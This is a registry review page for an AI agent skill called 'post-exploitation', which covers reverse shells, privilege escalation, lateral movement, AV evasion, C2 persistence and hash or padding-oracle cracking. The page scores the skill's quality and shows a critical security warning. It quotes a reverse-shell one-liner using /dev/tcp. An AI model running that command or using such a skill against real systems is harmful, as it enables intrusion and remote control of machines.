CtrlK
BlogDocsLog inGet started
Tessl Logo

post-exploitation

后渗透/提权+凭据破解+密码学:反弹shell,Linux/Windows提权,横向,隧道,免杀,C2持久化,hashcat/Padding Oracle/hash长度扩展。Use when post-exploitation, privilege escalation, lateral movement, or cracking crypto.

72

Quality

89%

Does it follow best practices?

Run evals on this skill

Adds up to 20 points to the overall score

View guide

SecuritybySnyk

Critical

Do not install without reviewing

SKILL.md
Quality
Evals
Security

Quality

Content

86%Weight 40%Scale 1-5

Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.

The content is a token-efficient, highly actionable reference, but its workflow sequencing is uneven and it is presented as a monolithic block rather than a navigable overview with separate reference files.

Suggestions

Add explicit step ordering and validation checkpoints (e.g., verify-before-spray) to the destructive/batch sections like persistence and lateral movement, not just the RDP block.

Break the single code block into headed sections and move the long hashcat mode table / tool lists into a separate reference file, signaling it as a one-level-deep reference for better progressive disclosure.

Add a short overview sentence at the top of the body orienting the reader to the two main sections (post-exploitation vs. crypto/cracking) so navigation is clear.

DimensionReasoningScore

Conciseness

An extremely lean cheat sheet with no concept over-explanation or padding; it assumes Claude's competence and every token (tool names, flags, modes) earns its place.

5 / 5

Actionability

Provides copy-paste-ready commands and concrete tooling throughout — 'bash -i >& /dev/tcp/IP/4444 0>&1', 'hashcat -m <mode> hash wordlist -r rules/best64.rule', 'padbuster', 'hashpump' — covering the common cases with executable guidance.

5 / 5

Workflow Clarity

The RDP credential block has an explicit validate-baseline-then-confirm loop and persistence entries reference a rollback ledger, but most sections are unordered checklists lacking explicit sequencing or validation checkpoints for destructive/batch ops.

4 / 5

Progressive Disclosure

The body is a single monolithic code block split only by two '===' section markers, with no bundle files and no clearly signaled one-level-deep references; the inline cross-skill mentions are not navigable file references.

3 / 5

Total

17

/

20

Passed

Description

92%Weight 40%Scale 1-5

Based on the skill's description, can an agent find and select it at the right time? Clear, specific descriptions lead to better discovery.

The description is a strong, dense capability list with an explicit 'Use when' trigger clause covering both what and when. Minor room for improvement lies only in trigger-term synonym coverage.

DimensionReasoningScore

Specificity

Lists multiple concrete, specific actions across the domain — '反弹shell', 'Linux/Windows提权', '横向', '隧道', '免杀', 'C2持久化', 'hashcat/Padding Oracle/hash长度扩展' — giving comprehensive coverage of the skill's capabilities.

5 / 5

Completeness

Clearly answers both 'what' (the enumerated action list) and 'when' (an explicit 'Use when...' clause with concrete trigger phrases), matching the top anchor.

5 / 5

Trigger Term Quality

The 'Use when post-exploitation, privilege escalation, lateral movement, or cracking crypto' clause provides good natural English trigger terms a user would say, but is missing a few synonyms and file-format-style variations, keeping it just below comprehensive.

4 / 5

Distinctiveness Conflict Risk

Occupies a clear, narrow niche (post-exploitation / red-team / cracking) with distinct triggers that are unlikely to fire for unrelated skills, giving minimal conflict risk.

5 / 5

Total

19

/

20

Passed

Validation

87%

Checks the skill against the spec for correct structure and formatting. All validation checks must pass before discovery and implementation can be scored.

Validation14 / 16 Passed

Validation for skill structure

CriteriaDescriptionResult

metadata_version

'metadata.version' is missing

Warning

metadata_field

'metadata' should map string keys to string values

Warning

Total

14

/

16

Passed

Repository
Ed1s0nZ/CyberStrikeAI
Reviewed

Table of Contents

Is this your skill?

If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.